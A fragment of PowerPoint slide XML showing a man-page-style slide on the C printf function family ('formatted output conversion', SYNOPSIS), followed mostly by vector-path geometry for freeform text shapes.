              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>fprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>dprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>, sprint, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>vprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>vfprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>vdprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>vsprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>vsnprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t> – formatted output conversion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>SYNOPSIS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5E3C3-686D-4420-A4AA-F529BC33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963FF054-94F6-4531-BF00-C951EDC5358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5325" y="2778125"/>
            <a:ext cx="7364413" cy="1876425"/>
            <a:chOff x="695325" y="2635250"/>
            <a:chExt cx="7364413" cy="1876425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1220" name="Freeform 715">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF4F13CB-E4F5-4A56-BCD8-9D367C53FACE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695325" y="2635250"/>
              <a:ext cx="103188" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 166 w 227"/>
                <a:gd name="T1" fmla="*/ 223 h 305"/>
                <a:gd name="T2" fmla="*/ 203 w 227"/>
                <a:gd name="T3" fmla="*/ 223 h 305"/>
                <a:gd name="T4" fmla="*/ 227 w 227"/>
                <a:gd name="T5" fmla="*/ 206 h 305"/>
                <a:gd name="T6" fmla="*/ 203 w 227"/>
                <a:gd name="T7" fmla="*/ 188 h 305"/>
                <a:gd name="T8" fmla="*/ 171 w 227"/>
                <a:gd name="T9" fmla="*/ 188 h 305"/>
                <a:gd name="T10" fmla="*/ 179 w 227"/>
                <a:gd name="T11" fmla="*/ 116 h 305"/>
                <a:gd name="T12" fmla="*/ 203 w 227"/>
                <a:gd name="T13" fmla="*/ 116 h 305"/>
                <a:gd name="T14" fmla="*/ 227 w 227"/>
                <a:gd name="T15" fmla="*/ 98 h 305"/>
                <a:gd name="T16" fmla="*/ 203 w 227"/>
                <a:gd name="T17" fmla="*/ 81 h 305"/>
                <a:gd name="T18" fmla="*/ 184 w 227"/>
                <a:gd name="T19" fmla="*/ 81 h 305"/>
                <a:gd name="T20" fmla="*/ 191 w 227"/>
                <a:gd name="T21" fmla="*/ 23 h 305"/>
                <a:gd name="T22" fmla="*/ 174 w 227"/>
                <a:gd name="T23" fmla="*/ 0 h 305"/>
                <a:gd name="T24" fmla="*/ 157 w 227"/>
                <a:gd name="T25" fmla="*/ 20 h 305"/>
                <a:gd name="T26" fmla="*/ 149 w 227"/>
                <a:gd name="T27" fmla="*/ 81 h 305"/>
                <a:gd name="T28" fmla="*/ 98 w 227"/>
                <a:gd name="T29" fmla="*/ 81 h 305"/>
                <a:gd name="T30" fmla="*/ 105 w 227"/>
                <a:gd name="T31" fmla="*/ 23 h 305"/>
                <a:gd name="T32" fmla="*/ 88 w 227"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 70 w 227"/>
                <a:gd name="T35" fmla="*/ 20 h 305"/>
                <a:gd name="T36" fmla="*/ 62 w 227"/>
                <a:gd name="T37" fmla="*/ 81 h 305"/>
                <a:gd name="T38" fmla="*/ 24 w 227"/>
                <a:gd name="T39" fmla="*/ 81 h 305"/>
                <a:gd name="T40" fmla="*/ 0 w 227"/>
                <a:gd name="T41" fmla="*/ 98 h 305"/>
                <a:gd name="T42" fmla="*/ 24 w 227"/>
                <a:gd name="T43" fmla="*/ 116 h 305"/>
                <a:gd name="T44" fmla="*/ 57 w 227"/>
                <a:gd name="T45" fmla="*/ 116 h 305"/>
                <a:gd name="T46" fmla="*/ 48 w 227"/>
                <a:gd name="T47" fmla="*/ 188 h 305"/>
                <a:gd name="T48" fmla="*/ 24 w 227"/>
                <a:gd name="T49" fmla="*/ 188 h 305"/>
                <a:gd name="T50" fmla="*/ 0 w 227"/>
                <a:gd name="T51" fmla="*/ 206 h 305"/>
                <a:gd name="T52" fmla="*/ 24 w 227"/>
                <a:gd name="T53" fmla="*/ 223 h 305"/>
                <a:gd name="T54" fmla="*/ 43 w 227"/>
                <a:gd name="T55" fmla="*/ 223 h 305"/>
                <a:gd name="T56" fmla="*/ 35 w 227"/>
                <a:gd name="T57" fmla="*/ 287 h 305"/>
                <a:gd name="T58" fmla="*/ 53 w 227"/>
                <a:gd name="T59" fmla="*/ 305 h 305"/>
                <a:gd name="T60" fmla="*/ 71 w 227"/>
                <a:gd name="T61" fmla="*/ 284 h 305"/>
                <a:gd name="T62" fmla="*/ 79 w 227"/>
                <a:gd name="T63" fmla="*/ 223 h 305"/>
                <a:gd name="T64" fmla="*/ 130 w 227"/>
                <a:gd name="T65" fmla="*/ 223 h 305"/>
                <a:gd name="T66" fmla="*/ 122 w 227"/>
                <a:gd name="T67" fmla="*/ 287 h 305"/>
                <a:gd name="T68" fmla="*/ 140 w 227"/>
                <a:gd name="T69" fmla="*/ 305 h 305"/>
                <a:gd name="T70" fmla="*/ 158 w 227"/>
                <a:gd name="T71" fmla="*/ 284 h 305"/>
                <a:gd name="T72" fmla="*/ 166 w 227"/>
                <a:gd name="T73" fmla="*/ 223 h 305"/>
                <a:gd name="T74" fmla="*/ 93 w 227"/>
                <a:gd name="T75" fmla="*/ 116 h 305"/>
                <a:gd name="T76" fmla="*/ 144 w 227"/>
                <a:gd name="T77" fmla="*/ 116 h 305"/>
                <a:gd name="T78" fmla="*/ 135 w 227"/>
                <a:gd name="T79" fmla="*/ 188 h 305"/>
                <a:gd name="T80" fmla="*/ 84 w 227"/>
                <a:gd name="T81" fmla="*/ 188 h 305"/>
                <a:gd name="T82" fmla="*/ 93 w 227"/>
                <a:gd name="T83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305">
                  <a:moveTo>
                    <a:pt x="166" y="223"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="203" y="223"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="223"/>
                    <a:pt x="227" y="223"/>
                    <a:pt x="227" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="188"/>
                    <a:pt x="209" y="188"/>
                    <a:pt x="203" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="171" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179" y="116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="116"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="116"/>
                    <a:pt x="227" y="116"/>
                    <a:pt x="227" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="81"/>
                    <a:pt x="209" y="81"/>
                    <a:pt x="203" y="81"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="81"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191" y="23"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="5"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="174" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="0"/>
                    <a:pt x="157" y="14"/>
                    <a:pt x="157" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="149" y="81"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="81"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105" y="23"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="5"/>
                    <a:pt x="95" y="0"/>
                    <a:pt x="88" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="70" y="14"/>
                    <a:pt x="70" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="62" y="81"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="81"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="81"/>
                    <a:pt x="0" y="81"/>
                    <a:pt x="0" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="116"/>
                    <a:pt x="18" y="116"/>
                    <a:pt x="24" y="116"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57" y="116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="223"/>
                    <a:pt x="18" y="223"/>
                    <a:pt x="24" y="223"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="43" y="223"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="285"/>
                    <a:pt x="35" y="287"/>
                    <a:pt x="35" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="296"/>
                    <a:pt x="42" y="305"/>
                    <a:pt x="53" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="305"/>
                    <a:pt x="70" y="290"/>
                    <a:pt x="71" y="284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="79" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130" y="223"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="285"/>
                    <a:pt x="122" y="287"/>
                    <a:pt x="122" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="296"/>
                    <a:pt x="129" y="305"/>
                    <a:pt x="140" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="305"/>
                    <a:pt x="157" y="290"/>
                    <a:pt x="158" y="284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="166" y="223"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="93" y="116"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144" y="116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93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1" name="Freeform 716">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8779CD42-B678-488F-AD1C-0BF90F76CC0B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25500" y="2635250"/>
              <a:ext cx="85725" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 116 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 306"/>
                <a:gd name="T2" fmla="*/ 96 w 188"/>
                <a:gd name="T3" fmla="*/ 91 h 306"/>
                <a:gd name="T4" fmla="*/ 25 w 188"/>
                <a:gd name="T5" fmla="*/ 91 h 306"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 106 h 306"/>
                <a:gd name="T8" fmla="*/ 25 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 306"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 306"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 306"/>
                <a:gd name="T14" fmla="*/ 21 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 306"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 291 h 306"/>
                <a:gd name="T18" fmla="*/ 21 w 188"/>
                <a:gd name="T19" fmla="*/ 306 h 306"/>
                <a:gd name="T20" fmla="*/ 168 w 188"/>
                <a:gd name="T21" fmla="*/ 306 h 306"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 291 h 306"/>
                <a:gd name="T24" fmla="*/ 168 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 306"/>
                <a:gd name="T26" fmla="*/ 116 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 306"/>
                <a:gd name="T28" fmla="*/ 116 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 306"/>
                <a:gd name="T30" fmla="*/ 116 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 306"/>
                <a:gd name="T32" fmla="*/ 91 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 306"/>
                <a:gd name="T34" fmla="*/ 66 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 306"/>
                <a:gd name="T36" fmla="*/ 91 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 306"/>
                <a:gd name="T38" fmla="*/ 116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6" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="96"/>
                    <a:pt x="113" y="91"/>
                    <a:pt x="96" y="91"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="91"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="91"/>
                    <a:pt x="4" y="91"/>
                    <a:pt x="4" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="25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6"/>
                    <a:pt x="13" y="306"/>
                    <a:pt x="21" y="306"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168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6" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="11"/>
                    <a:pt x="105" y="0"/>
                    <a:pt x="91" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="0"/>
                    <a:pt x="66" y="11"/>
                    <a:pt x="66" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="39"/>
                    <a:pt x="77" y="50"/>
                    <a:pt x="91" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="50"/>
                    <a:pt x="116" y="39"/>
                    <a:pt x="11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2" name="Freeform 717">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD970E6-57CA-4D63-AA3E-05ADCC60627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930275" y="2676525"/>
              <a:ext cx="114300" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 249"/>
                <a:gd name="T1" fmla="*/ 26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7 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 249"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 99 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 30 h 218"/>
                <a:gd name="T32" fmla="*/ 173 w 249"/>
                <a:gd name="T33" fmla="*/ 74 h 218"/>
                <a:gd name="T34" fmla="*/ 173 w 249"/>
                <a:gd name="T35" fmla="*/ 187 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 249"/>
                <a:gd name="T37" fmla="*/ 187 h 218"/>
                <a:gd name="T38" fmla="*/ 133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1 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 249"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 77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3" name="Freeform 718">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C872C1A0-BBF2-40D9-9C28-3CCA7C33AA7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063625" y="2674938"/>
              <a:ext cx="90488" cy="104775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4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4" name="Freeform 719">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDBEC73D-BEAA-4D77-9687-B26C528C132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181100" y="2635250"/>
              <a:ext cx="93663" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 119 w 204"/>
                <a:gd name="T1" fmla="*/ 20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5 h 305"/>
                <a:gd name="T8" fmla="*/ 20 w 204"/>
                <a:gd name="T9" fmla="*/ 30 h 305"/>
                <a:gd name="T10" fmla="*/ 85 w 204"/>
                <a:gd name="T11" fmla="*/ 30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0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5" name="Freeform 720">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A28A74F-8494-4C2A-B830-703DF02F4B1A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290638" y="2678113"/>
              <a:ext cx="114300" cy="101600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8 w 249"/>
                <a:gd name="T5" fmla="*/ 215 h 218"/>
                <a:gd name="T6" fmla="*/ 249 w 249"/>
                <a:gd name="T7" fmla="*/ 199 h 218"/>
                <a:gd name="T8" fmla="*/ 229 w 249"/>
                <a:gd name="T9" fmla="*/ 184 h 218"/>
                <a:gd name="T10" fmla="*/ 207 w 249"/>
                <a:gd name="T11" fmla="*/ 184 h 218"/>
                <a:gd name="T12" fmla="*/ 207 w 249"/>
                <a:gd name="T13" fmla="*/ 20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5 h 218"/>
                <a:gd name="T20" fmla="*/ 150 w 249"/>
                <a:gd name="T21" fmla="*/ 30 h 218"/>
                <a:gd name="T22" fmla="*/ 172 w 249"/>
                <a:gd name="T23" fmla="*/ 30 h 218"/>
                <a:gd name="T24" fmla="*/ 172 w 249"/>
                <a:gd name="T25" fmla="*/ 136 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 249"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 76 w 249"/>
                <a:gd name="T29" fmla="*/ 155 h 218"/>
                <a:gd name="T30" fmla="*/ 76 w 249"/>
                <a:gd name="T31" fmla="*/ 20 h 218"/>
                <a:gd name="T32" fmla="*/ 56 w 249"/>
                <a:gd name="T33" fmla="*/ 0 h 218"/>
                <a:gd name="T34" fmla="*/ 20 w 249"/>
                <a:gd name="T35" fmla="*/ 0 h 218"/>
                <a:gd name="T36" fmla="*/ 0 w 249"/>
                <a:gd name="T37" fmla="*/ 15 h 218"/>
                <a:gd name="T38" fmla="*/ 20 w 249"/>
                <a:gd name="T39" fmla="*/ 30 h 218"/>
                <a:gd name="T40" fmla="*/ 42 w 249"/>
                <a:gd name="T41" fmla="*/ 30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199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="184"/>
                    <a:pt x="236" y="184"/>
                    <a:pt x="229" y="184"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="184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6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6" y="187"/>
                    <a:pt x="76" y="171"/>
                    <a:pt x="76" y="155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6" name="Freeform 721">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{693DE8BC-DD13-4A0B-BCE0-B7228AC870A1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16050" y="2635250"/>
              <a:ext cx="109538" cy="144463"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 161 w 237"/>
                <a:gd name="T1" fmla="*/ 280 h 308"/>
                <a:gd name="T2" fmla="*/ 181 w 237"/>
                <a:gd name="T3" fmla="*/ 305 h 308"/>
                <a:gd name="T4" fmla="*/ 217 w 237"/>
                <a:gd name="T5" fmla="*/ 305 h 308"/>
                <a:gd name="T6" fmla="*/ 237 w 237"/>
                <a:gd name="T7" fmla="*/ 289 h 308"/>
                <a:gd name="T8" fmla="*/ 217 w 237"/>
                <a:gd name="T9" fmla="*/ 274 h 308"/>
                <a:gd name="T10" fmla="*/ 195 w 237"/>
                <a:gd name="T11" fmla="*/ 274 h 308"/>
                <a:gd name="T12" fmla="*/ 195 w 237"/>
                <a:gd name="T13" fmla="*/ 20 h 308"/>
                <a:gd name="T14" fmla="*/ 175 w 237"/>
                <a:gd name="T15" fmla="*/ 0 h 308"/>
                <a:gd name="T16" fmla="*/ 139 w 237"/>
                <a:gd name="T17" fmla="*/ 0 h 308"/>
                <a:gd name="T18" fmla="*/ 118 w 237"/>
                <a:gd name="T19" fmla="*/ 15 h 308"/>
                <a:gd name="T20" fmla="*/ 138 w 237"/>
                <a:gd name="T21" fmla="*/ 30 h 308"/>
                <a:gd name="T22" fmla="*/ 161 w 237"/>
                <a:gd name="T23" fmla="*/ 30 h 308"/>
                <a:gd name="T24" fmla="*/ 161 w 237"/>
                <a:gd name="T25" fmla="*/ 109 h 308"/>
                <a:gd name="T26" fmla="*/ 102 w 237"/>
                <a:gd name="T27" fmla="*/ 87 h 308"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 197 h 308"/>
                <a:gd name="T30" fmla="*/ 98 w 237"/>
                <a:gd name="T31" fmla="*/ 308 h 308"/>
                <a:gd name="T32" fmla="*/ 161 w 237"/>
                <a:gd name="T33" fmla="*/ 280 h 308"/>
                <a:gd name="T34" fmla="*/ 161 w 237"/>
                <a:gd name="T35" fmla="*/ 172 h 308"/>
                <a:gd name="T36" fmla="*/ 161 w 237"/>
                <a:gd name="T37" fmla="*/ 208 h 308"/>
                <a:gd name="T38" fmla="*/ 100 w 237"/>
                <a:gd name="T39" fmla="*/ 277 h 308"/>
                <a:gd name="T40" fmla="*/ 35 w 237"/>
                <a:gd name="T41" fmla="*/ 197 h 308"/>
                <a:gd name="T42" fmla="*/ 104 w 237"/>
                <a:gd name="T43" fmla="*/ 117 h 308"/>
                <a:gd name="T44" fmla="*/ 161 w 237"/>
                <a:gd name="T45" fmla="*/ 17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1" y="280"/>
                  </a:move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lose/>
                  <a:moveTo>
                    <a:pt x="161" y="172"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="161" y="208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="236"/>
                    <a:pt x="138" y="277"/>
                    <a:pt x="100" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="277"/>
                    <a:pt x="35" y="242"/>
                    <a:pt x="35" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="150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7" name="Freeform 722">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2B6B0B0-D36E-4013-A7B7-D4ECCCBB7C5A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541463" y="2674938"/>
              <a:ext cx="93663" cy="104775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8" name="Freeform 723">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95EAFD2E-07FA-4EE9-9507-02B6A095802B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787525" y="2651125"/>
              <a:ext cx="139700" cy="136525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 295 w 305"/>
                <a:gd name="T1" fmla="*/ 21 h 290"/>
                <a:gd name="T2" fmla="*/ 305 w 305"/>
                <a:gd name="T3" fmla="*/ 10 h 290"/>
                <a:gd name="T4" fmla="*/ 295 w 305"/>
                <a:gd name="T5" fmla="*/ 0 h 290"/>
                <a:gd name="T6" fmla="*/ 286 w 305"/>
                <a:gd name="T7" fmla="*/ 4 h 290"/>
                <a:gd name="T8" fmla="*/ 10 w 305"/>
                <a:gd name="T9" fmla="*/ 134 h 290"/>
                <a:gd name="T10" fmla="*/ 0 w 305"/>
                <a:gd name="T11" fmla="*/ 145 h 290"/>
                <a:gd name="T12" fmla="*/ 10 w 305"/>
                <a:gd name="T13" fmla="*/ 156 h 290"/>
                <a:gd name="T14" fmla="*/ 286 w 305"/>
                <a:gd name="T15" fmla="*/ 286 h 290"/>
                <a:gd name="T16" fmla="*/ 295 w 305"/>
                <a:gd name="T17" fmla="*/ 290 h 290"/>
                <a:gd name="T18" fmla="*/ 305 w 305"/>
                <a:gd name="T19" fmla="*/ 280 h 290"/>
                <a:gd name="T20" fmla="*/ 295 w 305"/>
                <a:gd name="T21" fmla="*/ 269 h 290"/>
                <a:gd name="T22" fmla="*/ 33 w 305"/>
                <a:gd name="T23" fmla="*/ 145 h 290"/>
                <a:gd name="T24" fmla="*/ 295 w 305"/>
                <a:gd name="T25" fmla="*/ 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90">
                  <a:moveTo>
                    <a:pt x="295" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="18"/>
                    <a:pt x="305" y="16"/>
                    <a:pt x="305" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="305" y="5"/>
                    <a:pt x="300" y="0"/>
                    <a:pt x="295" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="0"/>
                    <a:pt x="292" y="0"/>
                    <a:pt x="286" y="4"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10" y="134"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="136"/>
                    <a:pt x="0" y="139"/>
                    <a:pt x="0" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="151"/>
                    <a:pt x="4" y="153"/>
                    <a:pt x="10" y="156"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="286" y="286"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="290"/>
                    <a:pt x="293" y="290"/>
                    <a:pt x="295" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="300" y="290"/>
                    <a:pt x="305" y="285"/>
                    <a:pt x="305" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="305" y="274"/>
                    <a:pt x="301" y="272"/>
                    <a:pt x="295" y="269"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="33" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295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9" name="Freeform 724">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9950E48-3E4E-455E-8536-7E6E2F8EAC19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963738" y="2674938"/>
              <a:ext cx="87313" cy="104775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0" name="Freeform 725">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0588B55-28C4-475C-AD4F-A0E4B7CC6B97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073275" y="2647950"/>
              <a:ext cx="96838" cy="131763"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 280"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 280"/>
